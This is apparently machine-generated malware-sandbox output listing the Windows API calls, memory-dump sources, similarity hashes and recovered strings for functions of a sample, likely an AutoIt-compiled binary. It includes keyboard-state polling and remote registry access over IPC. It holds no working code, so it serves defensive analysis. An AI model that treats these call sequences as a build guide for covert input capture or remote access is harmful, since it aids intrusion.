                                                                  • GetWindowRect.USER32(00000000,?), ref: 00686662
                                                                  • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 006866C0
                                                                  • GetDlgItem.USER32(?,00000002), ref: 006866D0
                                                                  • GetWindowRect.USER32(00000000,?), ref: 006866E2
                                                                  • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00686736
                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00686744
                                                                  • GetWindowRect.USER32(00000000,?), ref: 00686756
                                                                  • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00686798
                                                                  • GetDlgItem.USER32(?,000003EA), ref: 006867AB
                                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 006867C1
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 006867CE
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                                  • String ID:
                                                                  • API String ID: 3096461208-0
                                                                  • Opcode ID: 7f12bf7d8512819d3364bc6526aed91a0d0e266296e40f436fd3287439df253a
                                                                  • Instruction ID: 7b57a2523250d4b075a0e210bc5970e6fb8746a318155ecaa9db00a4bc6b9ce6
                                                                  • Opcode Fuzzy Hash: 7f12bf7d8512819d3364bc6526aed91a0d0e266296e40f436fd3287439df253a
                                                                  • Instruction Fuzzy Hash: 465111B1B00205AFDF18DF68DD95AAEBBB6FB48315F108229F519E7290E7709D44CB50
                                                                  APIs
                                                                    • Part of subcall function 00622234: GetWindowLongW.USER32(?,000000EB), ref: 00622242
                                                                  • GetSysColor.USER32(0000000F), ref: 00622152
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ColorLongWindow
                                                                  • String ID:
                                                                  • API String ID: 259745315-0
                                                                  • Opcode ID: 3e7ab949a81766b2c18e5cbc7585a0a677c0770648a6cb12a180f7a01a26ec1d
                                                                  • Instruction ID: 5a97117cbefe29865fdc1031377a9c5ddd3de40a35c1709644710677092caf0a
                                                                  • Opcode Fuzzy Hash: 3e7ab949a81766b2c18e5cbc7585a0a677c0770648a6cb12a180f7a01a26ec1d
                                                                  • Instruction Fuzzy Hash: 59419F71100A61BFDB245F28AC58FB9376BAB42324F145255EBA28B3E1D6318D92DF11
                                                                  APIs
                                                                  • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 006628D1
                                                                  • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 006628EA
                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 006628FA
                                                                  • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00662912
                                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00662933
                                                                  • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,006211F5,00000000,00000000,00000000,000000FF,00000000), ref: 00662942
                                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0066295F
                                                                  • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,006211F5,00000000,00000000,00000000,000000FF,00000000), ref: 0066296E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                  • String ID: (o
                                                                  • API String ID: 1268354404-1684096767
                                                                  • Opcode ID: eb2c8af7fbc77e184e4bd77386848be0c5317f30d6b3e5513d62c136deba574b
                                                                  • Instruction ID: 111e6da71de11acd5a12f866ceef5499aa433ecd90e5181e046540944d7003c8
                                                                  • Opcode Fuzzy Hash: eb2c8af7fbc77e184e4bd77386848be0c5317f30d6b3e5513d62c136deba574b
                                                                  • Instruction Fuzzy Hash: F0518970600A0AAFDB24DF25DC55BAA7BF7FB58310F104628F9569B2A0D770E991DF40
                                                                  APIs
                                                                    • Part of subcall function 0062249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006224B0
                                                                    • Part of subcall function 006219CD: GetCursorPos.USER32(?), ref: 006219E1
                                                                    • Part of subcall function 006219CD: ScreenToClient.USER32(00000000,?), ref: 006219FE
                                                                    • Part of subcall function 006219CD: GetAsyncKeyState.USER32(00000001), ref: 00621A23
                                                                    • Part of subcall function 006219CD: GetAsyncKeyState.USER32(00000002), ref: 00621A3D
                                                                  • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 006B95C7
                                                                  • ImageList_EndDrag.COMCTL32 ref: 006B95CD
                                                                  • ReleaseCapture.USER32 ref: 006B95D3
                                                                  • SetWindowTextW.USER32(?,00000000), ref: 006B966E
                                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 006B9681
                                                                  • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 006B975B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                  • String ID: @GUI_DRAGFILE$@GUI_DROPID$(o$(o
                                                                  • API String ID: 1924731296-1905994682
                                                                  • Opcode ID: 6a4492b2a419c9518005f946b881c50e8b0ef297e7b5d8aa928bb0a56f66f64d
                                                                  • Instruction ID: 70c5677708dae663bb01a2e78a7957d571bdc2ca72d148c78f705b78ba6a08a6
                                                                  • Opcode Fuzzy Hash: 6a4492b2a419c9518005f946b881c50e8b0ef297e7b5d8aa928bb0a56f66f64d
                                                                  • Instruction Fuzzy Hash: AB518AB1104314AFD744EF24DC56BAA77E6FB88710F000A2CFA96972E2DB709944CF66
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00670D31,00000001,0000138C,00000001,00000000,00000001,?,0069EEAE,006F2430), ref: 0068A091
                                                                  • LoadStringW.USER32(00000000,?,00670D31,00000001), ref: 0068A09A
                                                                    • Part of subcall function 0062B329: _wcslen.LIBCMT ref: 0062B333
                                                                  • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00670D31,00000001,0000138C,00000001,00000000,00000001,?,0069EEAE,006F2430,?), ref: 0068A0BC
                                                                  • LoadStringW.USER32(00000000,?,00670D31,00000001), ref: 0068A0BF
                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0068A1E0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: HandleLoadModuleString$Message_wcslen
                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                  • API String ID: 747408836-2268648507
                                                                  • Opcode ID: dcd674a04eb443d467bbb9b3fb104d97c04304f685a0a32cb0abe81fecaaf260
                                                                  • Instruction ID: 69606d80cf2b4333ffc9a0b9326e863e73fa03374734bc13c261b22887930193
                                                                  • Opcode Fuzzy Hash: dcd674a04eb443d467bbb9b3fb104d97c04304f685a0a32cb0abe81fecaaf260
                                                                  • Instruction Fuzzy Hash: 9D419372800629AADB45FBE0ED56DEEB77AEF14300F100169F501B6092EB316F49CFA5
                                                                  APIs
                                                                    • Part of subcall function 00628577: _wcslen.LIBCMT ref: 0062858A
                                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00681093
                                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 006810AF
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 006810CB
                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 006810F5
                                                                  • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0068111D
                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00681128
                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0068112D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                  • API String ID: 323675364-22481851
                                                                  • Opcode ID: 576bfbdaf1351ad168ba34a765893aad16f2a8a69c65b5172e51a393452615bc
                                                                  • Instruction ID: 5cddd4ab3f6f0782f28efaeca0d5e4e2a70d5c7261d8628b778472291befff10
                                                                  • Opcode Fuzzy Hash: 576bfbdaf1351ad168ba34a765893aad16f2a8a69c65b5172e51a393452615bc
                                                                  • Instruction Fuzzy Hash: 47410672C10629ABCB11EFA4EC959EEB77AFF18740F004129F901AB261EB719E45CF54
                                                                  APIs
                                                                  • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 006B4AD9
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 006B4AE0
                                                                  • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 006B4AF3
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 006B4AFB
                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 006B4B06
                                                                  • DeleteDC.GDI32(00000000), ref: 006B4B10
                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 006B4B1A
                                                                  • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 006B4B30
                                                                  • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 006B4B3C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                  • String ID: static
                                                                  • API String ID: 2559357485-2160076837
                                                                  • Opcode ID: 6c1e6f1f44212a30a7494dc7a01bf15246eb197674ab7ebe813ad70c84efb6d6
                                                                  • Instruction ID: b35a59b5ea5ac864d244ac2108505428a94637513dee6e45bc4e02ab20c85f2c
                                                                  • Opcode Fuzzy Hash: 6c1e6f1f44212a30a7494dc7a01bf15246eb197674ab7ebe813ad70c84efb6d6
                                                                  • Instruction Fuzzy Hash: 373141B1140219BBDF219F64DC08FDA3B6AFF0D364F110325FA15A61A1DB75D890DB94
                                                                  APIs
                                                                  • VariantInit.OLEAUT32(?), ref: 006A46B9
                                                                  • CoInitialize.OLE32(00000000), ref: 006A46E7
                                                                  • CoUninitialize.OLE32 ref: 006A46F1
                                                                  • _wcslen.LIBCMT ref: 006A478A
                                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 006A480E
                                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 006A4932
                                                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 006A496B
                                                                  • CoGetObject.OLE32(?,00000000,006C0B64,?), ref: 006A498A
                                                                  • SetErrorMode.KERNEL32(00000000), ref: 006A499D
                                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 006A4A21
                                                                  • VariantClear.OLEAUT32(?), ref: 006A4A35
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                  • String ID:
                                                                  • API String ID: 429561992-0
                                                                  APIs
                                                                  • CoInitialize.OLE32(00000000), ref: 00698538
                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 006985D4
                                                                  • SHGetDesktopFolder.SHELL32(?), ref: 006985E8
                                                                  • CoCreateInstance.OLE32(006C0CD4,00000000,00000001,006E7E8C,?), ref: 00698634
                                                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 006986B9
                                                                  • CoTaskMemFree.OLE32(?,?), ref: 00698711
                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 0069879C
                                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 006987BF
                                                                  • CoTaskMemFree.OLE32(00000000), ref: 006987C6
                                                                  • CoTaskMemFree.OLE32(00000000), ref: 0069881B
                                                                  • CoUninitialize.OLE32 ref: 00698821
                                                                  Similarity
                                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                  • String ID:
                                                                  • API String ID: 2762341140-0
                                                                  APIs
                                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0068039F
                                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 006803F8
                                                                  • VariantInit.OLEAUT32(?), ref: 0068040A
                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 0068042A
                                                                  • VariantCopy.OLEAUT32(?,?), ref: 0068047D
                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00680491
                                                                  • VariantClear.OLEAUT32(?), ref: 006804A6
                                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 006804B3
                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006804BC
                                                                  • VariantClear.OLEAUT32(?), ref: 006804CE
                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006804D9
                                                                  Similarity
                                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                  • String ID:
                                                                  • API String ID: 2706829360-0
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?), ref: 0068A65D
                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 0068A6DE
                                                                  • GetKeyState.USER32(000000A0), ref: 0068A6F9
                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 0068A713
                                                                  • GetKeyState.USER32(000000A1), ref: 0068A728
                                                                  • GetAsyncKeyState.USER32(00000011), ref: 0068A740
                                                                  • GetKeyState.USER32(00000011), ref: 0068A752
                                                                  • GetAsyncKeyState.USER32(00000012), ref: 0068A76A
                                                                  • GetKeyState.USER32(00000012), ref: 0068A77C
                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 0068A794
                                                                  • GetKeyState.USER32(0000005B), ref: 0068A7A6
                                                                  Similarity
                                                                  • API ID: State$Async$Keyboard
                                                                  • String ID:
                                                                  • API String ID: 541375521-0
                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: _wcslen$BuffCharLower
                                                                  • String ID: cdecl$none$stdcall$winapi
                                                                  • API String ID: 707087890-567219261
                                                                  APIs
                                                                  • CoInitialize.OLE32 ref: 006A41D1
                                                                  • CoUninitialize.OLE32 ref: 006A41DC
                                                                  • CoCreateInstance.OLE32(?,00000000,00000017,006C0B44,?), ref: 006A4236
                                                                  • IIDFromString.OLE32(?,?), ref: 006A42A9
                                                                  • VariantInit.OLEAUT32(?), ref: 006A4341
                                                                  • VariantClear.OLEAUT32(?), ref: 006A4393
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                  • API String ID: 636576611-1287834457
                                                                  APIs
                                                                  • GetLocalTime.KERNEL32(?), ref: 00698C9C
                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00698CAC
                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00698CB8
                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00698D55
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00698D69
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00698D9B
                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00698DD1
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00698DDA
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: CurrentDirectoryTime$File$Local$System
                                                                  • String ID: *.*
                                                                  • API String ID: 1464919966-438819550
                                                                  APIs
                                                                  • CreateMenu.USER32 ref: 006B4715
                                                                  • SetMenu.USER32(?,00000000), ref: 006B4724
                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006B47AC
                                                                  • IsMenu.USER32(?), ref: 006B47C0
                                                                  • CreatePopupMenu.USER32 ref: 006B47CA
                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 006B47F7
                                                                  • DrawMenuBar.USER32 ref: 006B47FF
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                  • String ID: 0$F
                                                                  • API String ID: 161812096-3044882817
                                                                  APIs
                                                                    • Part of subcall function 0062B329: _wcslen.LIBCMT ref: 0062B333
                                                                    • Part of subcall function 006845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00684620
                                                                  • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 006828B1
                                                                  • GetDlgCtrlID.USER32 ref: 006828BC
                                                                  • GetParent.USER32 ref: 006828D8
                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 006828DB
                                                                  • GetDlgCtrlID.USER32(?), ref: 006828E4
                                                                  • GetParent.USER32(?), ref: 006828F8
                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 006828FB
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 711023334-1403004172
                                                                  APIs
                                                                    • Part of subcall function 0062B329: _wcslen.LIBCMT ref: 0062B333
                                                                    • Part of subcall function 006845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00684620
                                                                  • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00682990
                                                                  • GetDlgCtrlID.USER32 ref: 0068299B
                                                                  • GetParent.USER32 ref: 006829B7
                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 006829BA
                                                                  • GetDlgCtrlID.USER32(?), ref: 006829C3
                                                                  • GetParent.USER32(?), ref: 006829D7
                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 006829DA
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 711023334-1403004172
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 006B4539
                                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 006B453C
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 006B4563
                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 006B4586
                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 006B45FE
                                                                  • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 006B4648
                                                                  • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 006B4663
                                                                  • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 006B467E
                                                                  • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 006B4692
                                                                  • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 006B46AF
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$LongWindow
                                                                  • String ID:
                                                                  • API String ID: 312131281-0
                                                                  • Opcode ID: d780760b5c047afd088d695e72dc9076c9f1f6a92891a8b30b04b1a168123ab1
                                                                  • Instruction ID: b51504d185be423a5c01de984e55ef741955d6df9d572a9a43b90e4c1cad62c7
                                                                  • Opcode Fuzzy Hash: d780760b5c047afd088d695e72dc9076c9f1f6a92891a8b30b04b1a168123ab1
                                                                  • Instruction Fuzzy Hash: 3F614DB5A00219AFDB10DFA8CC81EEE77B9EF09710F104159FA14A73A2DB74A985DB50
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 0068BB18
                                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0068ABA8,?,00000001), ref: 0068BB2C
                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 0068BB33
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0068ABA8,?,00000001), ref: 0068BB42
                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0068BB54
                                                                  • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0068ABA8,?,00000001), ref: 0068BB6D
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0068ABA8,?,00000001), ref: 0068BB7F
                                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0068ABA8,?,00000001), ref: 0068BBC4
                                                                  • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0068ABA8,?,00000001), ref: 0068BBD9
                                                                  • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0068ABA8,?,00000001), ref: 0068BBE4
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                  • String ID:
                                                                  • API String ID: 2156557900-0
                                                                  • Opcode ID: a1c9871d179c79ec1b77b4bdfc95a272f931f776a50f1fdea7186764fb0b147e
                                                                  • Instruction ID: 3827dd4c6d8f3d41649586df603d94bba4f869df04ba962a78711073ad968060
                                                                  • Opcode Fuzzy Hash: a1c9871d179c79ec1b77b4bdfc95a272f931f776a50f1fdea7186764fb0b147e
                                                                  • Instruction Fuzzy Hash: D23173B5504204AFDB10AB14DC84FFE77ABEB44352F106255FA05D72A4EF74A980CB64
                                                                  APIs
                                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00622AF9
                                                                  • OleUninitialize.OLE32(?,00000000), ref: 00622B98
                                                                  • UnregisterHotKey.USER32(?), ref: 00622D7D
                                                                  • DestroyWindow.USER32(?), ref: 00663A1B
                                                                  • FreeLibrary.KERNEL32(?), ref: 00663A80
                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00663AAD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
